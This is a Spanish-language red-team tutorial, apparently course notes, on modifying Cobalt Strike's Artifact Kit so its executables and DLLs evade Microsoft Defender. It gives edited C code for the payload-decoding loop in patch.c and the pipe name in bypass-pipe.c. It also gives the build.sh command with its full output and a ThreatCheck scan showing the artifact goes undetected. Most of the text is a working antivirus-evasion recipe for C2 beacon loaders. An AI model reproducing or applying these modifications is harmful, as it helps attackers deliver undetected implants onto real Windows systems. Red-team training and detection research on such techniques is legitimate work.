Arsenal Kit

Cobalt Strike utiliza el Artifact Kit para generar sus ejecutables y DLLs. El Artifact Kit es parte del Arsenal Kit, que contiene una colección de kits: un marco de código fuente para crear ejecutables y DLLs que evaden algunos productos antivirus.

Es necesario modificar el codigo patch.c para hacer funcional el AV Bypass ya que constantemente se esta actualizando el Defender para detectar los binarios maliciosos. La forma mas sencilla utilizando Arsenal Kit es modificando las siguientes lineas.

Modificar esta parte del codigo.

/opt/CS491/arsenal-kit/kits/artifact/src-common/patch.c

114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
   /* decode the payload with the key */
//   for (int x = 0; x < length; x++) {
//      *((char *)ptr + x) = *((char *)buffer + x) ^ key[x % 8]; // 8 byte XoR
//   }

   for (int c = 0; c < length; c += 8) {
      for (int i = 0; i < 8 && (c + i) < length; i++) {
          char *y = (char *)ptr + c + i;
          char *r = (char *)buffer + c + i;
  
          // Random operation (assuming it's needed, unchanged)
          GetVersion();
  
          *y = *r ^ key[(c + i) % 8];  // XOR operation with key
      }
  }

Modificar el siguiente archivo.

/opt/CS491/arsenal-kit/kits/artifact/src-common/bypass-pipe.c

125
126
127
128
129
130
131
132
133
void start(HINSTANCE mhandle) {
   /* switched from snprintf... as some A/V product was flagging based on the function *sigh* 
      92, 92, 46, 92, 112, 105, 112, 101, 92 is \\.\pipe\
   
   */
   //sprintf(pipename, "%c%c%c%c%c%c%c%c%cnetsvc\\%d", 92, 92, 46, 92, 112, 105, 112, 101, 92, (int)(GetTickCount() % 9898));
   sprintf(pipename, "%c%c%c%c%c%c%c%c%cdoom\\s", 92, 92, 46, 92, 112, 105, 112, 101, 92);

   /* start our server and our client */

Compilar el artifact.

┌──(root㉿kali)-[/opt/CS491/arsenal-kit/kits/artifact]
└─# ./build.sh pipe VirtualAlloc 310272 5 false false none /opt/CS491/artifacts 
[Artifact kit] [+] You have a x86_64 mingw--I will recompile the artifacts
[Artifact kit] [*] Using allocator: VirtualAlloc
[Artifact kit] [*] Using STAGE size: 310272
[Artifact kit] [*] Using RDLL size: 5K
[Artifact kit] [*] Using system call method: none
[Artifact kit] [+] Artifact Kit: Building artifacts for technique: pipe
[Artifact kit] [*] Recompile artifact32.dll with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact32.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact32svc.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact32big.dll with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact32big.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact32svcbig.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact64.x64.dll with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact64.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact64svc.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact64big.x64.dll with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact64big.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact64svcbig.exe with src-common/bypass-pipe.c
[Artifact kit] [+] The artifacts for the bypass technique 'pipe' are saved in '/opt/CS491/artifacts/pipe'

Verificamos que nuestro artifact no es detectado utilizando ThreatCheck. El binario artifact64svcbig.exe denota que es stageless service executable.

C:\Tools\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe -f  C:\Payloads\artifacts\pipe\artifact64svcbig.exe

[+] No threat found!
[*] Run time: 0.72s

Por ultimo generamos nuestros beacons y ejecutamos los probamos en un entorno windows.

References

https://training.zeropointsecurity.co.uk/courses/take/red-team-ops/texts/37495050-artifact-kit

Malleable C2 Resource Kit